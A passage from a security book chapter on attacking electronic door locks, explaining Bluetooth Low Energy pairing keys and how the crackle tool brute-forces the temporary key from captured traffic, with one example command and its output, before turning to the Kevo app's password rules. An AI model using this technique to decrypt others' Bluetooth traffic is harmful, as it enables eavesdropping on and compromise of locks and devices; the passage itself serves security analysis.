exchange protocol begins by selecting a temporary key (TK) based on the well-respected
Advanced Encryption Standard (AES) encryption protocol.
According to the BLE specification, the value of the TK is 0 if the Just Works mode is
selected. This mode is used by devices that have little or no display or input mechanism, so
the pairing is automatic. Otherwise, a value between 0 and 999999 is used. This is a more
common method, in which the user is asked to verify the number generated on both the slave
and master devices using a display. Once the TK is calculated, the master and the slave use
the TK to establish a short-term key (STK). The STK is used to eventually establish the LTK.
Ryan has released a tool called crackle, which takes captured BLE data and attempts to
brute-force it using TK values of 0 through 999999. Once the TK is found, the STK can easily
be verified by decrypting it with the TK. Finally, the LTK can be obtained by decrypting it
using the STK. Assuming the captured data is stored in a file called capture.pcap, the following
command runs the crackle tool:
[bash]$ crackle -i capture.pcap -o decrypted.pcap
TK found: 249592
LTK found: 26db138d0aa63a12dd596228577c4731
Done, processed 106 total packets, decrypted 19Now a tool such as Wireshark can open the decrypted.pcap file, which contains data in
clear text. Note that Ryan’s brute-force method is not effective against Out-of-Band (OOB)
mode, in which a 128-bit key is exchanged through a protocol other than BLE. In this case,
brute-forcing the entire 128-bit key space can be time consuming and ineffective. But most
devices use either the Just Works mode or the six-digit-value mode, so a majority of BLE devi-
ces are vulnerable.
Anyone investigating a BLE IoT device should be familiar with Ryan’s research and the
Ubertooth set of tools, because they are indispensable for analysis of network traffic and test-
ing if the products in question are securely designed. Furthermore, as of this writing, the cur-
rent Bluetooth specification (4.1) does not address Ryan’s brute-force attacks, so devices that
rely upon BLE encryption remain vulnerable.
Kevo Mobile App Insecurities
The Kwikset Kevo lock shown in Figure 2-3 can be operated via the companion Kevo iOS app
on an iPhone.
Upon first launch, the user is asked to specify an email address and password. As shown
in Figure 2-7, passwords must be at least eight characters long and include at least one
number.
CHAPTER 2: ELECTRONIC LOCK PICKING—ABUSING DOOR LOCKS TO COMPROMISE(^50) PHYSICAL SECURITY
http://www.allitebooks.com